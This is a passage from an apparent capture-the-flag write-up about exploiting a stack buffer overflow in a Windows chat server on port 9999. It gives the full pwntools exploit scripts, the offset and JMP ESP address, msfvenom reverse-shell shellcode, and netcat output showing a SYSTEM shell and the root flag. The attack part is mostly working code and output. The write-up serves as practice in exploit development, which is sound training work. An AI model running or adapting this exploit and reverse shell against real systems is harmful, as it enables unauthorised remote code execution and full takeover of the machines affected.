Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(str(payload)+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
	print("[!] KO CHAT")
	r.close()
r.clean()
r.close()

The server crashes like expected with the EIP value 46307746. At this time I discovered that I did not need to create this script because I could send the pattern with nc but this is what I did.

Anyway recovering the exact offset with msf-pattern_offset points that the exact match is 4560 chars:

msf-pattern_offset -l 5000 -q 46307746
[*] Exact match at offset 4560

The script evolved taking in consideration that the offset will be covered with 4560 chars + “BBBB” (42424242 in Ascii)

#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "9999"
LIMIT = 60
offset = 4560
fuzz = "A"*offset

r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(str(fuzz)+"BBBB"+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
	print("[!] KO CHAT")
	r.close()
r.clean()
r.close()

The EIP is overwritten with 42424242 so I am on the track.

alt text

Now I want a JMP ESP instruction:

/usr/bin/msf-nasm_shell 
nasm > jmp esp
00000000  FFE4              jmp esp

Using mona inside Inmunity debugger to find a memory addres with the JMP instruction:

Mona working directory, will be C:\Users\admin\Desktop\chatserver in my case:

!mona config -set workingfolder C:\Users\admin\Desktop\%p
!mona modules
!mona find -s "\xff\xe4"

Inside the generated file find (C:\Users\admin\Desktop\chatserver) You can find memory addresses without protection like 0x62501533

0x625014df : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014eb : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014f7 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501503 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250150f : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250151b : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501527 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501533 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)

parsing the address to little endian:

62501533 -> “\x33\x15\x50\x62”

The next step is finding the badchars. For this task I used mona to generate the badchars and also modified my script:

!mona bytearray -cpb \x00
#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "9999"
LIMIT = 60
offset = 4560
fuzz = "A"*offset
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(str(fuzz)+"BBBB"+str(badchars)+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
	print("[!] KO CHAT")
	r.close()
r.clean()
r.close()

To compare the badchars with mona:

!mona compare -a 017DEEC0 -f C:\Users\admin\Desktop\chatserver\bytearray.bin

Worked on the first try! So the final badchar is only the /x00

Shellcode generated with msfvenom:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10πŸ˜„ LPORT=4433 -f c -v shellcode -b '\x00' EXITFUNC=thread 
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char shellcode[] = 
"\xda\xce\xd9\x74\x24\xf4\xba\x30\x2e\x3b\xeb\x5b\x33\xc9\xb1"
"\x52\x31\x53\x17\x03\x53\x17\x83\xdb\xd2\xd9\x1e\xe7\xc3\x9c"
"\xe1\x17\x14\xc1\x68\xf2\x25\xc1\x0f\x77\x15\xf1\x44\xd5\x9a"
"\x7a\x08\xcd\x29\x0e\x85\xe2\x9a\xa5\xf3\xcd\x1b\x95\xc0\x4c"
"\x98\xe4\x14\xae\xa1\x26\x69\xaf\xe6\x5b\x80\xfd\xbf\x10\x37"
"\x11\xcb\x6d\x84\x9a\x87\x60\x8c\x7f\x5f\x82\xbd\x2e\xeb\xdd"
"\x1d\xd1\x38\x56\x14\xc9\x5d\x53\xee\x62\x95\x2f\xf1\xa2\xe7"
"\xd0\x5e\x8b\xc7\x22\x9e\xcc\xe0\xdc\xd5\x24\x13\x60\xee\xf3"
"\x69\xbe\x7b\xe7\xca\x35\xdb\xc3\xeb\x9a\xba\x80\xe0\x57\xc8"
"\xce\xe4\x66\x1d\x65\x10\xe2\xa0\xa9\x90\xb0\x86\x6d\xf8\x63"
"\xa6\x34\xa4\xc2\xd7\x26\x07\xba\x7d\x2d\xaa\xaf\x0f\x6c\xa3"
"\x1c\x22\x8e\x33\x0b\x35\xfd\x01\x94\xed\x69\x2a\x5d\x28\x6e"
"\x4d\x74\x8c\xe0\xb0\x77\xed\x29\x77\x23\xbd\x41\x5e\x4c\x56"
"\x91\x5f\x99\xf9\xc1\xcf\x72\xba\xb1\xaf\x22\x52\xdb\x3f\x1c"
"\x42\xe4\x95\x35\xe9\x1f\x7e\x30\xe7\x1b\x0a\x2c\xf5\x23\xe3"
"\xfd\x70\xc5\x69\xee\xd4\x5e\x06\x97\x7c\x14\xb7\x58\xab\x51"
"\xf7\xd3\x58\xa6\xb6\x13\x14\xb4\x2f\xd4\x63\xe6\xe6\xeb\x59"
"\x8e\x65\x79\x06\x4e\xe3\x62\x91\x19\xa4\x55\xe8\xcf\x58\xcf"
"\x42\xed\xa0\x89\xad\xb5\x7e\x6a\x33\x34\xf2\xd6\x17\x26\xca"
"\xd7\x13\x12\x82\x81\xcd\xcc\x64\x78\xbc\xa6\x3e\xd7\x16\x2e"
"\xc6\x1b\xa9\x28\xc7\x71\x5f\xd4\x76\x2c\x26\xeb\xb7\xb8\xae"
"\x94\xa5\x58\x50\x4f\x6e\x78\xb3\x45\x9b\x11\x6a\x0c\x26\x7c"
"\x8d\xfb\x65\x79\x0e\x09\x16\x7e\x0e\x78\x13\x3a\x88\x91\x69"
"\x53\x7d\x95\xde\x54\x54";

The final script:

#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "9999"

offset = 4560
fuzz = "A"*offset

shellcode = ("\xda\xce\xd9\x74\x24\xf4\xba\x30\x2e\x3b\xeb\x5b\x33\xc9\xb1"
"\x52\x31\x53\x17\x03\x53\x17\x83\xdb\xd2\xd9\x1e\xe7\xc3\x9c"
"\xe1\x17\x14\xc1\x68\xf2\x25\xc1\x0f\x77\x15\xf1\x44\xd5\x9a"
"\x7a\x08\xcd\x29\x0e\x85\xe2\x9a\xa5\xf3\xcd\x1b\x95\xc0\x4c"
"\x98\xe4\x14\xae\xa1\x26\x69\xaf\xe6\x5b\x80\xfd\xbf\x10\x37"
"\x11\xcb\x6d\x84\x9a\x87\x60\x8c\x7f\x5f\x82\xbd\x2e\xeb\xdd"
"\x1d\xd1\x38\x56\x14\xc9\x5d\x53\xee\x62\x95\x2f\xf1\xa2\xe7"
"\xd0\x5e\x8b\xc7\x22\x9e\xcc\xe0\xdc\xd5\x24\x13\x60\xee\xf3"
"\x69\xbe\x7b\xe7\xca\x35\xdb\xc3\xeb\x9a\xba\x80\xe0\x57\xc8"
"\xce\xe4\x66\x1d\x65\x10\xe2\xa0\xa9\x90\xb0\x86\x6d\xf8\x63"
"\xa6\x34\xa4\xc2\xd7\x26\x07\xba\x7d\x2d\xaa\xaf\x0f\x6c\xa3"
"\x1c\x22\x8e\x33\x0b\x35\xfd\x01\x94\xed\x69\x2a\x5d\x28\x6e"
"\x4d\x74\x8c\xe0\xb0\x77\xed\x29\x77\x23\xbd\x41\x5e\x4c\x56"
"\x91\x5f\x99\xf9\xc1\xcf\x72\xba\xb1\xaf\x22\x52\xdb\x3f\x1c"
"\x42\xe4\x95\x35\xe9\x1f\x7e\x30\xe7\x1b\x0a\x2c\xf5\x23\xe3"
"\xfd\x70\xc5\x69\xee\xd4\x5e\x06\x97\x7c\x14\xb7\x58\xab\x51"
"\xf7\xd3\x58\xa6\xb6\x13\x14\xb4\x2f\xd4\x63\xe6\xe6\xeb\x59"
"\x8e\x65\x79\x06\x4e\xe3\x62\x91\x19\xa4\x55\xe8\xcf\x58\xcf"
"\x42\xed\xa0\x89\xad\xb5\x7e\x6a\x33\x34\xf2\xd6\x17\x26\xca"
"\xd7\x13\x12\x82\x81\xcd\xcc\x64\x78\xbc\xa6\x3e\xd7\x16\x2e"
"\xc6\x1b\xa9\x28\xc7\x71\x5f\xd4\x76\x2c\x26\xeb\xb7\xb8\xae"
"\x94\xa5\x58\x50\x4f\x6e\x78\xb3\x45\x9b\x11\x6a\x0c\x26\x7c"
"\x8d\xfb\x65\x79\x0e\x09\x16\x7e\x0e\x78\x13\x3a\x88\x91\x69"
"\x53\x7d\x95\xde\x54\x54")

esp = "\x33\x15\x50\x62"
nop = "\x90"*20

r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send("A"*offset+esp+nop+str(shellcode)+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
	print("[!] KO CHAT")
	r.close()
r.clean()
r.close()

Listening on my machine with nc:

nc -lvp 4433         
listening on [any] 4433 ...
10.10πŸ˜„: inverse host lookup failed: Unknown host
connect to [10.10πŸ˜„] from (UNKNOWN) [10.10πŸ˜„] 49299
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\chatserver>

Worked !

So now my custom script can be fired agaisnt the real machine.

Just change the IP to the real one. Worked flawless on the first try 😎

nc -lvp 4433
listening on [any] 4433 ...
10.10πŸ˜„: inverse host lookup failed: Unknown host
connect to [10.10πŸ˜„] from (UNKNOWN) [10.10πŸ˜„] 49467
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

The service was running as nt authority\system so the machine is rooted.

Finally the root flag is under the following path:

C:\Users\drake\Desktop>type root.txt
type root.txt
5b10πŸ˜„

I enjoyed the machine because all went as expected without issues, the only badchar /x00 was refreshing because I expected a lot of debugging on the badchar process. Not bad at all. The machine description suggests that you have to do reverse engineering the .exe file probably you can use another approach like using Ghidra, radare2 or another reverse tool but my goal was to practice the bufferoverflow attacks with mona and the exploit development with python and pwn tools.

I was happy at the end, also more funnier than exploit the same .exe file with different badchars/offset like the previous posts. Good stuff.


Thanks for reading!